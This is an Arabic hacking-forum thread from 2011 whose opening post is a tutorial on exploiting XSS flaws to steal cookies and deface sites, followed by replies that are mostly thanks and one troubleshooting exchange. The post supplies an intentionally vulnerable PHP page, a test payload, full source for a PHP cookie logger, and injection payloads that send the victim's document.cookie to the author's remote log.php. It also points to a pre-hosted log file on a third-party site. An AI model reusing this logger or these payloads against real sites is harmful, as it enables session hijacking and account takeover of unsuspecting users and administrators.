التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-21-2011, 03:26 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~


بسم الله الرحمآن الرحيم


ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss



################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره

نسميه مثلا ..~

xss.php



ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

<?
echo $_GET***91;'test'***93; ;

echo 
'<b>@nor15din</b>'
?>


طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع




طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

'"--></style></script>***************("Www.VbspiderS.Com")</script> 
بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~




تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

<?php 


function GetIP() 

    if (
getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        
$ip getenv("HTTP_CLIENT_IP"); 
    else if (
getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        
$ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (
getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        
$ip getenv("REMOTE_ADDR"); 
    else if (isset(
$_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        
$ip $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        
$ip "unknown"
    return(
$ip); 


function 
logData() 

    
$ipLog="nor15din.txt"
    $****** = 
$_SERVER***91;'QUERY_STRING'***93;; 
    
$register_globals = (bool) ini_get('register_gobals'); 
    if (
$register_globals$ip getenv('REMOTE_ADDR'); 
    else 
$ip GetIP(); 

    
$rem_port $_SERVER***91;'REMOTE_PORT'***93;; 
    
$user_agent $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    
$rqst_method $_SERVER***91;'METHOD'***93;; 
    
$rem_host $_SERVER***91;'REMOTE_HOST'***93;; 
    
$referer $_SERVER***91;'HTTP_REFERER'***93;; 
    
$date=date ("l dS of F Y h:i:s A"); 
    
$log=fopen("$ipLog""a+"); 

    if (
preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        
fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    
fclose($log); 


logData();

echo 
'<b>powered by vbspiders team</b>'
?>
لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~


الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt



طيب الآن كيف نستغل التغره ..~


يلزمنى كود تلغيم ..~

كود PHP:

"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script> 
or

كود PHP:

"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script> 
حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره




اقتباس
http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس
IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******=

ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(




لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML



لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات

http://www.illicitromance.com/nor15din.txt


ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

priv8 ~ تعليق الاندكس من ثغرات priv8 ~ xss

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan



جديد استخدامات xss وهي الـ phishing login




بالتوفيق ..
@nor15din





F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp


التعديل الأخير تم بواسطة bleu moon ; 09-10-2011 الساعة 07:01 PM.

   

رد مع اقتباس
قديم 08-21-2011, 03:38 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Crazy Dz
 

 

 
إحصائية العضو







Crazy Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى Crazy Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
Crazy Dz is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


بارك الله فيك علي شرح ثغرة قوية
التوقيع

http://im9.gulfup.com/2011-09-14/1316009561971.jpg

 

   

رد مع اقتباس
قديم 08-21-2011, 03:40 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 

 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


بارك الله فيك

التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 


التعديل الأخير تم بواسطة k4$p3r-MA ; 08-21-2011 الساعة 03:44 PM.

   

رد مع اقتباس
قديم 08-21-2011, 03:41 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Crazy Dz
بارك الله فيك علي شرح ثغرة قوية

والله تغره قويه خصوصا اذا كانت من نوع stored xss

   

رد مع اقتباس
قديم 08-21-2011, 03:43 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة k4$p3r-MA
woooow thx fun بارك الله فيك

thx fun

شفتني العب مع القرده ؟

-------------------------------------

برب بمزح ههه
يعطيك العافيه يا حبيبي كاسبر !
الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله :(

   

رد مع اقتباس
قديم 08-21-2011, 04:51 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.Mix
 

 

 
إحصائية العضو







Dr.Mix غير متواجد حالياً

إرسال رسالة عبر MSN إلى Dr.Mix

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Mix is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

التوقيع

قريبا افتتاح دورة الافتر افكتس من طرف DR.MIX

http://img11.hostingpics.net/pics/36...sDisk00054.jpg

تابعونا

 

   

رد مع اقتباس
قديم 08-21-2011, 05:59 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Haboubamix
مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

يعطيك العافيه ..~

   

رد مع اقتباس
قديم 08-21-2011, 06:10 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Antivirus7
 

 

 
إحصائية العضو







Antivirus7 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Antivirus7 is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك
تقبل مروري

التوقيع


http://www.1ss1.com/data/2010/1ss1_13125526341.gif

http://www.hafr-albatin.com/rmden/e9da07c793.gif
Volcano
Sniper Gaza
The Best Friends 4 ever

.: لآ لإخترآق المسلمين :.
و تذكرو قول النبي صلى الله عليه و سلم
.: (كل المسلم على المسلم حرام دمه وماله وعرضه)
:.

 

   

رد مع اقتباس
قديم 08-21-2011, 06:57 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Antivirus7
وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك
تقبل مروري

منور الموضوع يا حلو والله
تسلم على المرور العطر

   

رد مع اقتباس
قديم 08-21-2011, 09:15 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية DR.THMoORY
 

 

 
إحصائية العضو





DR.THMoORY غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DR.THMoORY is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


بطل حبيبي..
يسلمو ايديك..

   

رد مع اقتباس
قديم 08-21-2011, 09:26 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة DR.THMoORY
بطل حبيبي..
يسلمو ايديك..

منور الموضوع يا حبيبي

   

رد مع اقتباس
قديم 08-21-2011, 11:30 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية mass1993
 

 

 
إحصائية العضو






mass1993 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mass1993 is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

التعديل الأخير تم بواسطة mass1993 ; 08-21-2011 الساعة 11:35 PM.

   

رد مع اقتباس
قديم 08-22-2011, 07:35 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة mass1993
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط !
لازم يكون ع شل :(

   

رد مع اقتباس
قديم 08-22-2011, 08:52 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية dragonnet
 

 

 
إحصائية العضو






dragonnet غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dragonnet is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


مشكور صديقي !!

التوقيع

عندما اخترعت الساعة كم كانت الساعة



 

   

رد مع اقتباس
قديم 08-22-2011, 08:55 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة dragonnet
مشكور صديقي !!

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
مشكله, موضوع, موقع, لكن, الدين, الصور, احتراف, استفسار, جديد, رفع, شرح, xss


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:21 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0